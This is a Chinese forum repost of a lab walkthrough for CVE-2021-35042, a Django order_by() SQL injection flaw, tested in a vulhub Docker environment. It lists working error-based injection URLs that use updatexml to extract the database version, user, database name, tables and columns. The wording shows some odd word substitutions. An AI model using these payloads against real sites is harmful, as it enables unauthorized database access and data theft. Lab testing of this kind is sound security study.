罪恶克星 发表于 2024-6-21 13:03:13

Python 开辟 框架安全:Django SQL注入漏洞测试.(CVE-2021-35042)

什么是 Django 框架

Django 是一个用 Python 编写的 Web 应用程序框架。它提供了很多工具和库,使得开辟 Web 应用程序变得更加轻易和高效。Django 遵循了“MTV”(模型-模板-视图)的设计模式,将应用程序的不同组件分脱离来,使得开辟人员可以更加专注于应用程序的不同方面。Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不敷,攻击者可利用该漏洞在未授权的环境下,构造恶意数据实验 SQL 注入攻击,终极造成服务器敏感信息泄漏。

目次:

什么是 Django 框架
开启 漏洞 靶场:
(1)查看目次:
(2)启用 vulhub 漏洞:
(3)进行欣赏:主机的 8000 端口.
进行 漏洞 测试:
(1)寻找 URL 有输入点的地方就行:
(2)构造报错注入进行攻击获取数据:(查询根目次信息)
(3)构造报错注入进行攻击获取数据:(查询数据库版本信息)
(4)构造报错注入进行攻击获取数据:(查当前用户)
(5)构造报错注入进行攻击获取数据:(查当前数据库)
(6)构造报错注入进行攻击获取数据:(查表)
(7)构造报错注入进行攻击获取数据:(查字段)
开启 漏洞 靶场:

Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客
(1)查看目次:

(1)cd vulhub

(2)ls https://img-blog.csdnimg.cn/direct/135d2edb5a884b2eb42d61c99ac0e62c.png​ 
(2)启用 vulhub 漏洞:

(1)cd django             // 切换到对应的漏洞目录.

(2)cd CVE-2021-35042            // 切换到对应的漏洞版本.

(3)docker-compose build         // 建立容器

(4)docker-compose up -d         // 启用漏洞环境.

(5)docker ps                      // 查看环境运行状态 ​ https://img-blog.csdnimg.cn/direct/98f189a103474d94b6a73c1eadb238b4.png​
https://img-blog.csdnimg.cn/direct/0b880c73c304409d9cbe453c5d90b7f3.png
(3)进行欣赏:主机的 8000 端口.

https://img-blog.csdnimg.cn/direct/6920124bfbb3471ea431eee8fda26ce1.png
进行 漏洞 测试:

(1)怎么测试框架类型.(欣赏器安装插件检测 Wappalyzer )

https://img-blog.csdnimg.cn/direct/b986874b42654eaa8496bc7dd994268e.png
(2)寻找 URL 有输入点的地方就行:

例如:

http://172.16.10.19:8000//vuln/?order=后面就是写SQL语句的查询. https://img-blog.csdnimg.cn/direct/0bbb4f1398ff46618d64ea20bd614a6c.png
(3)构造报错注入进行攻击获取数据:(查询根目次信息)

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23
https://img-blog.csdnimg.cn/direct/f944921b5a3c401b989442665c28e295.png
(4)构造报错注入进行攻击获取数据:(查询数据库版本信息)

/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23 https://img-blog.csdnimg.cn/direct/58746864b38f4b86b21445b80479fd30.png
(5)构造报错注入进行攻击获取数据:(查当前用户)

http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,%20concat%280x7e,%28select%20user%28%29%29%29,1%29%23 https://img-blog.csdnimg.cn/direct/045b5fce4058441d8d51739a3d73490a.png
(6)构造报错注入进行攻击获取数据:(查当前数据库)

http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,%20concat%280x7e,%28select%20database%28%29%29%29,1%29%23 https://img-blog.csdnimg.cn/direct/9272c08494df438596258e3344110c4b.png
(7)构造报错注入进行攻击获取数据:(查表)

http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,%20concat%280x7e,%28select%20group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29%29%29,1%29%23 https://img-blog.csdnimg.cn/direct/e43c94e677c74c7ebe5ca4896362ea12.png

(8)构造报错注入进行攻击获取数据:(查字段)

http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,concat%280x5c,%28select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%200,1%29,0x5c%29,1%29%23 https://img-blog.csdnimg.cn/direct/3230c71e02394544b352946c2f420583.png


   

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: Python 开辟 框架安全:Django SQL注入漏洞测试.(CVE-2021-35042)